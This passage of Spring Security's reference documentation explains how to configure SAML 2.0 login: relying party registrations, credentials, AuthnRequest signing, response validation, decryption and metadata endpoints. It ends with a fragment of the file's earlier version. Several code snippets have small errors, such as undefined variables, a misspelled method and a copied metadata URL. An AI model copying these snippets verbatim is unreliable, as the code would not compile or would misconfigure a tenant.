}\n}\n----\n====\n\nIf the application doesn't expose a `WebSecurityConfigurerAdapter` bean, then Spring Boot will expose the above default one.\n\nYou can replace this by exposing the bean within the application:\n\n.Custom SAML 2.0 Login Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class MyCustomSecurityConfiguration extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .mvcMatchers(\"\/messages\/**\").hasAuthority(\"ROLE_USER\")\n .anyRequest().authenticated()\n )\n .saml2Login(withDefaults());\n }\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@EnableWebSecurity\nclass MyCustomSecurityConfiguration : WebSecurityConfigurerAdapter() {\n override fun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(\"\/messages\/**\", hasAuthority(\"ROLE_USER\"))\n authorize(anyRequest, authenticated)\n }\n saml2Login {\n }\n }\n }\n}\n----\n====\n\nThe above requires the role of `USER` for any URL that starts with `\/messages\/`.\n\n[[servlet-saml2login-relyingpartyregistrationrepository]]\nThe second `@Bean` Spring Boot creates is a {security-api-url}org\/springframework\/security\/saml2\/provider\/service\/registration\/RelyingPartyRegistrationRepository.html[`RelyingPartyRegistrationRepository`], which represents the asserting party and relying party metadata.\nThis includes things like the location of the SSO endpoint the relying party should use when requesting authentication from the asserting party.\n\nYou can override the default by publishing your own `RelyingPartyRegistrationRepository` bean.\nFor example, you can look up the asserting party's configuration by hitting its metadata endpoint like so:\n\n.Relying Party Registration Repository\n====\n[source,java]\n----\n@Value(\"${metadata.location}\")\nString assertingPartyMetadataLocation;\n\n@Bean\npublic RelyingPartyRegistrationRepository relyingPartyRegistrations() {\n\tRelyingPartyRegistration registration = RelyingPartyRegistrations\n .fromMetadataLocation(assertingPartyMetadataLocation)\n .registrationId(\"example\")\n .build();\n return new InMemoryRelyingPartyRegistrationRepository(registration);\n}\n----\n====\n\nOr you can provide each detail manually, as you can see below:\n\n.Relying Party Registration Repository Manual Configuration\n====\n[source,java]\n----\n@Value(\"${verification.key}\")\nFile verificationKey;\n\n@Bean\npublic RelyingPartyRegistrationRepository relyingPartyRegistrations() throws Exception {\n X509Certificate certificate = X509Support.decodeCertificate(this.verificationKey);\n Saml2X509Credential credential = Saml2X509Credential.verification(certificate);\n RelyingPartyRegistration registration = RelyingPartyRegistration\n .withRegistrationId(\"example\")\n .assertingPartyDetails(party -> party\n .entityId(\"https:\/\/idp.example.com\/issuer\")\n .singleSignOnServiceLocation(\"https:\/\/idp.example.com\/SSO.saml2\")\n .wantAuthnRequestsSigned(false)\n .verificationX509Credentials(c -> c.add(credential))\n )\n .build();\n return new InMemoryRelyingPartyRegistrationRepository(registration);\n}\n----\n====\n\n[NOTE]\nNote that `X509Support` is an OpenSAML class, used here in the snippet for brevity\n\n[[servlet-saml2login-relyingpartyregistrationrepository-dsl]]\n\nAlternatively, you can directly wire up the repository using the DSL, which will also override the auto-configured `WebSecurityConfigurerAdapter`:\n\n.Custom Relying Party Registration DSL\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class MyCustomSecurityConfiguration extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .mvcMatchers(\"\/messages\/**\").hasAuthority(\"ROLE_USER\")\n .anyRequest().authenticated()\n )\n .saml2Login(saml2 -> saml2\n .relyingPartyRegistrationRepository(relyingPartyRegistrations())\n );\n }\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@EnableWebSecurity\nclass MyCustomSecurityConfiguration : WebSecurityConfigurerAdapter() {\n override fun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(\"\/messages\/**\", hasAuthority(\"ROLE_USER\"))\n authorize(anyRequest, authenticated)\n }\n saml2Login {\n relyingPartyRegistrationRepository = relyingPartyRegistrations()\n }\n }\n }\n}\n----\n====\n\n[NOTE]\nA relying party can be multi-tenant by registering more than one relying party in the `RelyingPartyRegistrationRepository`.\n\n[[servlet-saml2login-relyingpartyregistration]]\n=== RelyingPartyRegistration\nA {security-api-url}org\/springframework\/security\/saml2\/provider\/service\/registration\/RelyingPartyRegistration.html[`RelyingPartyRegistration`]\ninstance represents a link between an relying party and assering party's metadata.\n\nIn a `RelyingPartyRegistration`, you can provide relying party metadata like its `Issuer` value, where it expects SAML Responses to be sent to, and any credentials that it owns for the purposes of signing or decrypting payloads.\n\nAlso, you can provide asserting party metadata like its `Issuer` value, where it expects AuthnRequests to be sent to, and any public credentials that it owns for the purposes of the relying party verifying or encrypting payloads.\n\nThe following `RelyingPartyRegistration` is the minimum required for most setups:\n\n[source,java]\n----\nRelyingPartyRegistration relyingPartyRegistration = RelyingPartyRegistrations\n .fromMetadataLocation(\"https:\/\/ap.example.org\/metadata\")\n .registrationId(\"my-id\")\n .build();\n----\n\nThough a more sophisticated setup is also possible, like so:\n\n[source,java]\n----\nRelyingPartyRegistration relyingPartyRegistration = RelyingPartyRegistration.withRegistrationId(\"my-id\")\n .entityId(\"{baseUrl}\/{registrationId}\")\n .decryptionX509Credentials(c -> c.add(relyingPartyDecryptingCredential()))\n .assertionConsumerServiceLocation(\"\/my-login-endpoint\/{registrationId}\")\n .assertingParty(party -> party\n .entityId(\"https:\/\/ap.example.org\")\n .verificationX509Credentials(c -> c.add(assertingPartyVerifyingCredential()))\n .singleSignOnServiceLocation(\"https:\/\/ap.example.org\/SSO.saml2\")\n );\n----\n\n[TIP]\nThe top-level metadata methods are details about the relying party.\nThe methods inside `assertingPartyDetails` are details about the asserting party.\n\n[NOTE]\nThe location where a relying party is expecting SAML Responses is the Assertion Consumer Service Location.\n\nThe default for the relying party's `entityId` is `+{baseUrl}\/saml2\/service-provider-metadata\/{registrationId}+`.\nThis is this value needed when configuring the asserting party to know about your relying party.\n\nThe default for the `assertionConsumerServiceLocation` is `+\/login\/saml2\/sso\/{registrationId}+`.\nIt's mapped by default to <<servlet-saml2login-authentication-saml2webssoauthenticationfilter,`Saml2WebSsoAuthenticationFilter`>> in the filter chain.\n\n[[servlet-saml2login-rpr-uripatterns]]\n==== URI Patterns\n\nYou probably noticed in the above examples the `+{baseUrl}+` and `+{registrationId}+` placeholders.\n\nThese are useful for generating URIs. As such, the relying party's `entityId` and `assertionConsumerServiceLocation` support the following placeholders:\n\n* `baseUrl` - the scheme, host, and port of a deployed application\n* `registrationId` - the registration id for this relying party\n* `baseScheme` - the scheme of a deployed application\n* `baseHost` - the host of a deployed application\n* `basePort` - the port of a deployed application\n\nFor example, the `assertionConsumerServiceLocation` defined above was:\n\n`+\/my-login-endpoint\/{registrationId}+`\n\nwhich in a deployed application would translate to\n\n`+\/my-login-endpoint\/adfs+`\n\nThe `entityId` above was defined as:\n\n`+{baseUrl}\/{registrationId}+`\n\nwhich in a deployed application would translate to\n\n`+https:\/\/rp.example.com\/adfs+`\n\n[[servlet-saml2login-rpr-credentials]]\n==== Credentials\n\nYou also likely noticed the credential that was used.\n\nOftentimes, a relying party will use the same key to sign payloads as well as decrypt them.\nOr it will use the same key to verify payloads as well as encrypt them.\n\nBecause of this, Spring Security ships with `Saml2X509Credential`, a SAML-specific credential that simplifies configuring the same key for different use cases.\n\nAt a minimum, it's necessary to have a certificate from the asserting party so that the asserting party's signed responses can be verified.\n\nTo construct a `Saml2X509Credential` that you'll use to verify assertions from the asserting party, you can load the file and use\nthe `CertificateFactory` like so:\n\n[source,java]\n----\nResource resource = new ClassPathResource(\"ap.crt\");\ntry (InputStream is = resource.getInputStream()) {\n\tX509Certificate certificate = (X509Certificate)\n CertificateFactory.getInstance(\"X.509\").generateCertificate(is);\n\treturn Saml2X509Credential.verification(certificate);\n}\n----\n\nLet's say that the asserting party is going to also encrypt the assertion.\nIn that case, the relying party will need a private key to be able to decrypt the encrypted value.\n\nIn that case, you'll need an `RSAPrivateKey` as well as its corresponding `X509Certificate`.\nYou can load the first using Spring Security's `RsaKeyConverters` utility class and the second as you did before:\n\n[source,java]\n----\nX509Certificate certificate = relyingPartyDecryptionCertificate();\nResource resource = new ClassPathResource(\"rp.crt\");\ntry (InputStream is = resource.getInputStream()) {\n\tRSAPrivateKey rsa = RsaKeyConverters.pkcs8().convert(is);\n\treturn Saml2X509Credential.decryption(rsa, certificate);\n}\n----\n\n[TIP]\nWhen you specify the locations of these files as the appropriate Spring Boot properties, then Spring Boot will perform these conversions for you.\n\n[[servlet-saml2login-rpr-relyingpartyregistrationresolver]]\n==== Resolving the Relying Party from the Request\n\nAs seen so far, Spring Security resolves the `RelyingPartyRegistration` by looking for the registration id in the URI path.\n\nThere are a number of reasons you may want to customize. Among them:\n\n* You may know that you will never be a multi-tenant application and so want to have a simpler URL scheme\n* You may identify tenants in a way other than by the URI path\n\nTo customize the way that a `RelyingPartyRegistration` is resolved, you can configure a custom `Converter<HttpServletRequest, RelyingPartyRegistration>`.\nThe default looks up the registration id from the URI's last path element and looks it up in your `RelyingPartyRegistrationRepository`.\n\nYou can provide a simpler resolver that, for example, always returns the same relying party:\n\n[source,java]\n----\npublic class SingleRelyingPartyRegistrationResolver\n implements Converter<HttpServletRequest, RelyingPartyRegistration> {\n\n\t@Override\n public RelyingPartyRegistration convert(HttpServletRequest request) {\n\t\treturn this.relyingParty;\n }\n}\n----\n\nThen, you can provide this resolver to the appropriate filters that <<servlet-saml2login-sp-initiated-factory, produce `<saml2:AuthnRequest>` s>>, <<servlet-saml2login-authenticate-responses, authenticate `<saml2:Response>` s>>, and <<servlet-saml2login-metadata, produce `<saml2:SPSSODescriptor>` metadata>>.\n\n[NOTE]\nRemember that if you have any placeholders in your `RelyingPartyRegistration`, your resolver implementation should resolve them.\n\n[[servlet-saml2login-rpr-duplicated]]\n==== Duplicated Relying Party Configurations\n\nWhen an application uses multiple asserting parties, some configuration is duplicated between `RelyingPartyRegistration` instances:\n\n* The relying party's `entityId`\n* Its `assertionConsumerServiceLocation`, and\n* Its credentials, for example its signing or decryption credentials\n\nWhat's nice about this setup is credentials may be more easily rotated for some identity providers vs others.\n\nThe duplication can be alleviated in a few different ways.\n\nFirst, in YAML this can be alleviated with references, like so:\n\n[source,yaml]\n----\nspring:\n security:\n saml2:\n relyingparty:\n okta:\n signing.credentials: &relying-party-credentials\n - private-key-location: classpath:rp.key\n - certificate-location: classpath:rp.crt\n identityprovider:\n entity-id: ...\n azure:\n signing.credentials: *relying-party-credentials\n identityprovider:\n entity-id: ...\n----\n\nSecond, in a database, it's not necessary to replicate `RelyingPartyRegistration` 's model.\n\nThird, in Java, you can create a custom configuration method, like so:\n\n[source,java]\n----\nprivate RelyingPartyRegistration.Builder\n addRelyingPartyDetails(RelyingPartyRegistration.Builder builder) {\n\n\tSaml2X509Credential signingCredential = ...\n\tbuilder.signingX509Credentials(c -> c.addAll(signingCredential));\n\t\/\/ ... other relying party configurations\n}\n\n@Bean\npublic RelyingPartyRegistrationRepository relyingPartyRegistrations() {\n RelyingPartyRegistration okta = addRelyingPartyDetails(\n RelyingPartyRegistration\n .fromMetadataLocation(oktaMetadataUrl)\n .registrationId(\"okta\")).build();\n\n RelyingPartyRegistration azure = addRelyingPartyDetails(\n RelyingPartyRegistration\n .fromMetadataLocation(oktaMetadataUrl)\n .registrationId(\"azure\")).build();\n\n return new InMemoryRelyingPartyRegistrationRepository(okta, azure);\n}\n----\n\n[[servlet-saml2login-sp-initiated-factory]]\n=== Producing `<saml2:AuthnRequest>` s\n\nAs stated earlier, Spring Security's SAML 2.0 support produces a `<saml2:AuthnRequest>` to commence authentication with the asserting party.\n\nSpring Security achieves this in part by registering the `Saml2WebSsoAuthenticationRequestFilter` in the filter chain.\nThis filter by default responds to endpoint `+\/saml2\/authenticate\/{registrationId}+`.\n\nFor example, if you were deployed to `https:\/\/rp.example.com` and you gave your registration an ID of `okta`, you could navigate to:\n\n`https:\/\/rp.example.org\/saml2\/authenticate\/ping`\n\nand the result would be a redirect that included a `SAMLRequest` parameter containing the signed, deflated, and encoded `<saml2:AuthnRequest>`.\n\n[[servlet-saml2login-sp-initiated-factory-signing]]\n==== Changing How the `<saml2:AuthnRequest>` Gets Sent\n\nBy default, Spring Security signs each `<saml2:AuthnRequest>` and send it as a GET to the asserting party.\n\nMany asserting parties don't require a signed `<saml2:AuthnRequest>`.\nThis can be configured automatically via `RelyingPartyRegistrations`, or you can supply it manually, like so:\n\n\n.Not Requiring Signed AuthnRequests\n====\n.Boot\n[source,yaml,role=\"primary\"]\n----\nspring:\n security:\n saml2:\n relyingparty:\n okta:\n identityprovider:\n entity-id: ...\n singlesignon.sign-request: false\n----\n\n.Java\n[source,java,role=\"secondary\"]\n----\nRelyingPartyRegistration relyingPartyRegistration = RelyingPartyRegistration.withRegistrationId(\"okta\")\n \/\/ ...\n .assertingPartyDetails(party -> party\n \/\/ ...\n .wantAuthnRequestsSigned(false)\n );\n----\n====\n\nOtherwise, you will need to specify a private key to `RelyingPartyRegistration#signingX509Credentials` so that Spring Security can sign the `<saml2:AuthnRequest>` before sending.\n\n[[servlet-saml2login-sp-initiated-factory-algorithm]]\nBy default, Spring Security will sign the `<saml2:AuthnRequest>` using `rsa-sha256`, though some asserting parties will require a different algorithm, as indicated in their metadata.\n\nYou can configure the algorithm based on the asserting party's <<servlet-saml2login-relyingpartyregistrationrepository,metadata using `RelyingPartyRegistrations`>>.\n\nOr, you can provide it manually:\n\n[source,java]\n----\nString metadataLocation = \"classpath:asserting-party-metadata.xml\";\nRelyingPartyRegistration relyingPartyRegistration = RelyingPartyRegistrations.fromMetadataLocation(metadataLocation)\n \/\/ ...\n .assertingPartyDetails((party) -> party\n \/\/ ...\n .signingAlgorithms((sign) -> sign.add(SignatureConstants.ALGO_ID_SIGNATURE_RSA_SHA512))\n );\n----\n\nNOTE: The snippet above uses the OpenSAML `SignatureConstants` class to supply the algorithm name.\nBut, that's just for convenience.\nSince the datatype is `String`, you can supply the name of the algorithm directly.\n\n[[servlet-saml2login-sp-initiated-factory-binding]]\nSome asserting parties require that the `<saml2:AuthnRequest>` be POSTed.\nThis can be configured automatically via `RelyingPartyRegistrations`, or you can supply it manually, like so:\n\n[source,java]\n----\nRelyingPartyRegistration relyingPartyRegistration = RelyingPartyRegistration.withRegistrationId(\"okta\")\n \/\/ ...\n .assertingPartyDetails(party -> party\n \/\/ ...\n .singleSignOnServiceBinding(Saml2MessageType.POST)\n );\n----\n\n\n[[servlet-saml2login-sp-initiated-factory-custom-authnrequest]]\n==== Customizing OpenSAML's `AuthnRequest` Instance\n\nThere are a number of reasons that you may want to adjust an `AuthnRequest`.\nFor example, you may want `ForceAuthN` to be set to `true`, which Spring Security sets to `false` by default.\n\nIf you don't need information from the `HttpServletRequest` to make your decision, then the easiest way is to <<servlet-saml2login-opensaml-customization,register a custom `AuthnRequestMarshaller` with OpenSAML>>.\nThis will give you access to post-process the `AuthnRequest` instance before it's serialized.\n\nBut, if you do need something from the request, then you can use create a custom `Saml2AuthenticationRequestContext` implementation and then a `Converter<Saml2AuthenticationRequestContext, AuthnRequest>` to build an `AuthnRequest` yourself, like so:\n\n[source,java]\n----\n@Component\npublic class AuthnRequestConverter implements\n Converter<Saml2AuthenticationRequestContext, AuthnRequest> {\n\n\tprivate final AuthnRequestBuilder authnRequestBuilder;\n\tprivate final IssuerBuilder issuerBuilder;\n\n\t\/\/ ... constructor\n\n\tpublic AuthnRequest convert(Saml2AuthenticationRequestContext context) {\n\t\tMySaml2AuthenticationRequestContext myContext = (MySaml2AuthenticationRequestContext) context;\n\t\tIssuer issuer = issuerBuilder.buildObject();\n\t\tissuer.setValue(myContext.getIssuer());\n\n\t\tAuthnRequest authnRequest = authnRequestBuilder.buildObject();\n\t\tauthnRequest.setIssuer(iss);\n authnRequest.setDestination(myContext.getDestination());\n\t\tauthnRequest.setAssertionConsumerServiceURL(myContext.getAssertionConsumerServiceUrl());\n\n\t\t\/\/ ... additional settings\n\n\t\tauthRequest.setForceAuthn(myContext.getForceAuthn());\n\t\treturn authnRequest;\n\t}\n}\n----\n\nThen, you can construct your own `Saml2AuthenticationRequestContextResolver` and `Saml2AuthenticationRequestFactory` and publish them as `@Bean` s:\n\n[source,java]\n----\n@Bean\nSaml2AuthenticationRequestContextResolver authenticationRequestContextResolver() {\n\tSaml2AuthenticationRequestContextResolver resolver =\n new DefaultSaml2AuthenticationRequestContextResolver();\n\treturn request -> {\n Saml2AuthenticationRequestContext context = resolver.resolve(request);\n return new MySaml2AuthenticationRequestContext(context, request.getParameter(\"force\") != null);\n\t};\n}\n\n@Bean\nSaml2AuthenticationRequestFactory authenticationRequestFactory(\n\t\tAuthnRequestConverter authnRequestConverter) {\n\n\tOpenSamlAuthenticationRequestFactory authenticationRequestFactory =\n new OpenSamlAuthenticationRequestFactory();\n\tauthenticationRequestFactory.setAuthenticationRequestContextConverter(authnRequestConverter);\n\treturn authenticationRequestFactory;\n}\n----\n\n[[servlet-saml2login-authenticate-responses]]\n=== Authenticating `<saml2:Response>` s\n\nTo verify SAML 2.0 Responses, Spring Security uses <<servlet-saml2login-architecture,`OpenSamlAuthenticationProvider`>> by default.\n\nYou can configure this in a number of ways including:\n\n1. Setting a clock skew to timestamp validation\n2. Mapping the response to a list of `GrantedAuthority` instances\n3. Customizing the strategy for validating assertions\n4. Customizing the strategy for decrypting response and assertion elements\n\nTo configure these, you'll use the `saml2Login#authenticationManager` method in the DSL.\n\n[[servlet-saml2login-opensamlauthenticationprovider-clockskew]]\n==== Setting a Clock Skew\n\nIt's not uncommon for the asserting and relying parties to have system clocks that aren't perfectly synchronized.\nFor that reason, you can configure `OpenSamlAuthenticationProvider` 's default assertion validator with some tolerance:\n\n[source,java]\n----\n@EnableWebSecurity\npublic class SecurityConfig extends WebSecurityConfigurerAdapter {\n\n @Override\n protected void configure(HttpSecurity http) throws Exception {\n OpenSamlAuthenticationProvider authenticationProvider = new OpenSamlAuthenticationProvider();\n authenticationProvider.setAssertionValidator(OpenSamlAuthenticationProvider\n .createDefaultAssertionValidator(assertionToken -> {\n \t\t\tMap<String, Object> params = new HashMap<>();\n \t\t\tparams.put(CLOCK_SKEW, Duration.ofMinutes(10).toMillis());\n \t\t\t\/\/ ... other validation parameters\n \t\t\treturn new ValidationContext(params);\n \t\t})\n );\n\n http\n .authorizeRequests(authz -> authz\n .anyRequest().authenticated()\n )\n .saml2Login(saml2 -> saml2\n .authenticationManager(new ProviderManager(authenticationProvider))\n );\n }\n}\n----\n\n[[servlet-saml2login-opensamlauthenticationprovider-userdetailsservice]]\n==== Coordinating with a `UserDetailsService`\n\nOr, perhaps you would like to include user details from a legacy `UserDetailsService`.\nIn that case, the response authentication converter can come in handy, as can be seen below:\n\n[source,java]\n----\n@EnableWebSecurity\npublic class SecurityConfig extends WebSecurityConfigurerAdapter {\n @Autowired\n UserDetailsService userDetailsService;\n\n @Override\n protected void configure(HttpSecurity http) throws Exception {\n OpenSamlAuthenticationProvider authenticationProvider = new OpenSamlAuthenticationProvider();\n authenticationProvider.setResponseAuthenticationConverter(responseToken -> {\n \tSaml2Authentication authentication = OpenSamlAuthenticationProvider\n .createDefaultResponseAuthenticationConverter() <1>\n .convert(responseToken);\n \tAssertion assertion = responseToken.getResponse().getAssertions().get(0);\n String username = assertion.getSubject().getNameID().getValue();\n UserDetails userDetails = this.userDetailsService.loadUserByUsername(username); <2>\n return MySaml2Authentication(userDetails, authentication); <3>\n });\n\n http\n .authorizeRequests(authz -> authz\n .anyRequest().authenticated()\n )\n .saml2Login(saml2 -> saml2\n .authenticationManager(new ProviderManager(authenticationProvider))\n );\n }\n}\n----\n<1> First, call the default converter, which extracts attributes and authorities from the response\n<2> Second, call the <<servlet-authentication-userdetailsservice, `UserDetailsService`>> using the relevant information\n<3> Third, return a custom authentication that includes the user details\n\n[NOTE]\nIt's not required to call `OpenSamlAuthenticationProvider` 's default authentication converter.\nIt returns a `Saml2AuthenticatedPrincipal` containing the attributes it extracted from `AttributeStatement` s as well as the single `ROLE_USER` authority.\n\n[[servlet-saml2login-opensamlauthenticationprovider-additionalvalidation]]\n==== Performing Additional Validation\n\n`OpenSamlAuthenticationProvider` performs minimal validation on SAML 2.0 Assertions.\nAfter verifying the signature, it will:\n\n1. Validate `<AudienceRestriction>` and `<DelegationRestriction>` conditions\n2. Validate `<SubjectConfirmation>` s, expect for any IP address information\n\nTo perform additional validation, you can configure your own assertion validator that delegates to `OpenSamlAuthenticationProvider` 's default and then performs its own.\n\n[[servlet-saml2login-opensamlauthenticationprovider-onetimeuse]]\nFor example, you can use OpenSAML's `OneTimeUseConditionValidator` to also validate a `<OneTimeUse>` condition, like so:\n\n[source,java]\n----\nOpenSamlAuthenticationProvider provider = new OpenSamlAuthenticationProvider();\nOneTimeUseConditionValidator validator = ...;\nprovider.setAssertionValidator(assertionToken -> {\n Saml2ResponseValidatorResult result = OpenSamlAuthenticationProvider\n .createDefaultAssertionValidator()\n .convert(assertionToken);\n Assertion assertion = assertionToken.getAssertion();\n OneTimeUse oneTimeUse = assertion.getConditions().getOneTimeUse();\n ValidationContext context = new ValidationContext();\n try {\n \tif (validator.validate(oneTimeUse, assertion, context) == ValidationResult.VALID) {\n \t\treturn result;\n \t}\n } catch (Exception e) {\n \treturn result.concat(new Saml2Error(INVALID_ASSERTION, e.getMessage()));\n }\n return result.contact(new Saml2Error(INVALID_ASSERTION, context.getValidationFailureMessage()));\n});\n----\n\n[NOTE]\nWhile recommended, it's not necessary to call `OpenSamlAuthenticationProvider` 's default assertion validator.\nA circumstance where you would skip it would be if you don't need it to check the `<AudienceRestriction>` or the `<SubjectConfirmation>` since you are doing those yourself.\n\n[[servlet-saml2login-opensamlauthenticationprovider-decryption]]\n==== Customizing Decryption\n\nSpring Security decrypts `<saml2:EncryptedAssertion>`, `<saml2:EncryptedAttribute>`, and `<saml2:EncryptedID>` elements automatically by using the decryption <<servlet-saml2login-rpr-credentials,`Saml2X509Credential` instances>> registered in the <<servlet-saml2login-relyingpartyregistration,`RelyingPartyRegistration`>>.\n\n`OpenSamlAuthenticationProvider` exposes <<servlet-saml2login-architecture,two decryption strategies>>.\nThe response decrypter is for decrypting encrypted elements of the `<saml2:Response>`, like `<saml2:EncryptedAssertion>`.\nThe assertion decrypter is for decrypting encrypted elements of the `<saml2:Assertion>`, like `<saml2:EncryptedAttribute>` and `<saml2:EncryptedID>`.\n\nYou can replace `OpenSamlAuthenticationProvider`'s default decryption strategy with your own.\nFor example, if you have a separate service that decrypts the assertions in a `<saml2:Response>`, you can use it instead like so:\n\n[source,java]\n----\nMyDecryptionService decryptionService = ...;\nOpenSamlAuthenticationProvider provider = new OpenSamlAuthenticationProvider();\nprovider.setResponseElementsDecrypter((responseToken) -> decryptionService.decrypt(responseToken.getResponse()));\n----\n\nIf you are also decrypting individual elements in a `<saml2:Assertion>`, you can customize the assertion decrypter, too:\n\n[source,java]\n----\nprovider.setAssertionElementsDecrypter((assertionToken) -> decryptionService.decrypt(assertionToken.getAssertion()));\n----\n\nNOTE: There are two separate decrypters since assertions can be signed separately from responses.\nTrying to decrypt a signed assertion's elements before signature verification may invalidate the signature.\nIf your asserting party signs the response only, then it's safe to decrypt all elements using only the response decrypter.\n\n[[servlet-saml2login-authenticationmanager-custom]]\n==== Using a Custom Authentication Manager\n\n[[servlet-saml2login-opensamlauthenticationprovider-authenticationmanager]]\nOf course, the `authenticationManager` DSL method can be also used to perform a completely custom SAML 2.0 authentication.\nThis authentication manager should expect a `Saml2AuthenticationToken` object containing the SAML 2.0 Response XML data.\n\n[source,java]\n----\n@EnableWebSecurity\npublic class SecurityConfig extends WebSecurityConfigurerAdapter {\n\n @Override\n protected void configure(HttpSecurity http) throws Exception {\n AuthenticationManager authenticationManager = new MySaml2AuthenticationManager(...);\n http\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .saml2Login(saml2 -> saml2\n .authenticationManager(authenticationManager)\n )\n ;\n }\n}\n----\n\n[[servlet-saml2login-authenticatedprincipal]]\n=== Using `Saml2AuthenticatedPrincipal`\n\nWith the relying party correctly configured for a given asserting party, it's ready to accept assertions.\nOnce the relying party validates an assertion, the result is a `Saml2Authentication` with a `Saml2AuthenticatedPrincipal`.\n\nThis means that you can access the principal in your controller like so:\n\n[source,java]\n----\n@Controller\npublic class MainController {\n\t@GetMapping(\"\/\")\n\tpublic String index(@AuthenticationPrincipal Saml2AuthenticatedPrincipal principal, Model model) {\n\t\tString email = principal.getFirstAttribute(\"email\");\n\t\tmodel.setAttribute(\"email\", email);\n\t\treturn \"index\";\n\t}\n}\n----\n\n[TIP]\nBecause the SAML 2.0 specification allows for each attribute to have multiple values, you can either call `getAttribute` to get the list of attributes or `getFirstAttribute` to get the first in the list.\n`getFirstAttribute` is quite handy when you know that there is only one value.\n\n[[servlet-saml2login-metadata]]\n=== Producing `<saml2:SPSSODescriptor>` Metadata\n\nYou can publish a metadata endpoint by adding the `Saml2MetadataFilter` to the filter chain, as you'll see below:\n\n[source,java]\n----\nConverter<HttpServletRequest, RelyingPartyRegistration> relyingPartyRegistrationResolver =\n new DefaultRelyingPartyRegistrationResolver(this.relyingPartyRegistrationRepository);\nSaml2MetadataFilter filter = new Saml2MetadataFilter(\n\t\trelyingPartyRegistrationResolver,\n new OpenSamlMetadataResolver());\n\nhttp\n \/\/ ...\n .saml2Login(withDefaults())\n .addFilterBefore(new Saml2MetadataFilter(r), Saml2WebSsoAuthenticationFilter.class);\n----\n\nYou can use this metadata endpoint to register your relying party with your asserting party.\nThis is often as simple as finding the correct form field to supply the metadata endpoint.\n\nBy default, the metadata endpoint is `+\/saml2\/service-provider-metadata\/{registrationId}+`.\nYou can change this by calling the `setRequestMatcher` method on the filter:\n\n[source,java]\n----\nfilter.setRequestMatcher(new AntPathRequestMatcher(\"\/saml2\/metadata\/{registrationId}\", \"GET\"));\n----\n\nensuring that the `registrationId` hint is at the end of the path.\n\nOr, if you have registered a custom relying party registration resolver in the constructor, then you can specify a path without a `registrationId` hint, like so:\n\n[source,java]\n----\nfilter.setRequestMatcher(new AntPathRequestMatcher(\"\/saml2\/metadata\", \"GET\"));\n----\n\n[[servlet-saml2login-logout]]\n=== Performing Single Logout\n\nSpring Security does not yet support single logout.\n\nGenerally speaking, though, you can achieve this by creating and registering a custom `LogoutSuccessHandler` and `RequestMatcher`:\n\n[source,java]\n----\nhttp\n \/\/ ...\n .logout(logout -> logout\n .logoutSuccessHandler(myCustomSuccessHandler())\n .logoutRequestMatcher(myRequestMatcher())\n )\n----\n\nThe success handler will send logout requests to the asserting party.\n\nThe request matcher will detect logout requests from the asserting party.\n","old_contents":"\n[[servlet-saml2login]]\n== SAML 2.0 Login\n:figures: images\/servlet\/saml2\n:icondir: images\/icons\n\nThe SAML 2.0 Login feature provides an application with the capability to act as a SAML 2.0 Relying Party, having users https:\/\/wiki.shibboleth.net\/confluence\/display\/CONCEPT\/FlowsAndConfig[log in] to the application by using their existing account at a SAML 2.0 Asserting Party (Okta, ADFS, etc).\n\nNOTE: SAML 2.0 Login is implemented by using the *Web Browser SSO Profile*, as specified in\nhttps:\/\/www.oasis-open.org\/committees\/download.php\/35389\/sstc-saml-profiles-errata-2.0-wd-06-diff.pdf#page=15[SAML 2 Profiles].\n\n[[servlet-saml2login-spring-security-history]]\nSince 2009, support for relying parties has existed as an https:\/\/github.com\/spring-projects\/spring-security-saml\/tree\/1e013b07a7772defd6a26fcfae187c9bf661ee8f#spring-saml[extension project].\nIn 2019, the process began to port that into https:\/\/github.com\/spring-projects\/spring-security[Spring Security] proper.\nThis process is similar to the one started in 2017 for <<oauth2,Spring Security's OAuth 2.0 support>>.\n\n[NOTE]\n====\nA working sample for {gh-samples-url}\/servlet\/spring-boot\/java\/saml2-login[SAML 2.0 Login] is available in the {gh-samples-url}[Spring Security Samples repository].\n====\n\nLet's take a look at how SAML 2.0 Relying Party Authentication works within Spring Security.\nFirst, we see that, like <<oauth2login, OAuth 2.0 Login>>, Spring Security takes the user to a third-party for performing authentication.\nIt does this through a series of redirects.\n\n.Redirecting to Asserting Party Authentication\nimage::{figures}\/saml2webssoauthenticationrequestfilter.png[]\n\nThe figure above builds off our <<servlet-securityfilterchain,`SecurityFilterChain`>> and <<servlet-authentication-abstractprocessingfilter, `AbstractAuthenticationProcessingFilter`>> diagrams:\n\nimage:{icondir}\/number_1.png[] First, a user makes an unauthenticated request to the resource `\/private` for which it is not authorized.\n\nimage:{icondir}\/number_2.png[] Spring Security's <<servlet-authorization-filtersecurityinterceptor,`FilterSecurityInterceptor`>> indicates that the unauthenticated request is __Denied__ by throwing an `AccessDeniedException`.\n\nimage:{icondir}\/number_3.png[] Since the user lacks authorization, the <<servlet-exceptiontranslationfilter,`ExceptionTranslationFilter`>> initiates __Start Authentication__.\nThe configured <<servlet-authentication-authenticationentrypoint,`AuthenticationEntryPoint`>> is an instance of {security-api-url}org\/springframework\/security\/web\/authentication\/LoginUrlAuthenticationEntryPoint.html[`LoginUrlAuthenticationEntryPoint`] which redirects to <<servlet-saml2login-sp-initiated-factory,the `<saml2:AuthnRequest>` generating endpoint>>, `Saml2WebSsoAuthenticationRequestFilter`.\nOr, if you've <<servlet-saml2login-relyingpartyregistrationrepository,configured more than one asserting party>>, it will first redirect to a picker page.\n\nimage:{icondir}\/number_4.png[] Next, the `Saml2WebSsoAuthenticationRequestFilter` creates, signs, serializes, and encodes a `<saml2:AuthnRequest>` using its configured <<servlet-saml2login-sp-initiated-factory,`Saml2AuthenticationRequestFactory`>>.\n\nimage:{icondir}\/number_5.png[] Then, the browser takes this `<saml2:AuthnRequest>` and presents it to the asserting party.\nThe asserting party attempts to authentication the user.\nIf successful, it will return a `<saml2:Response>` back to the 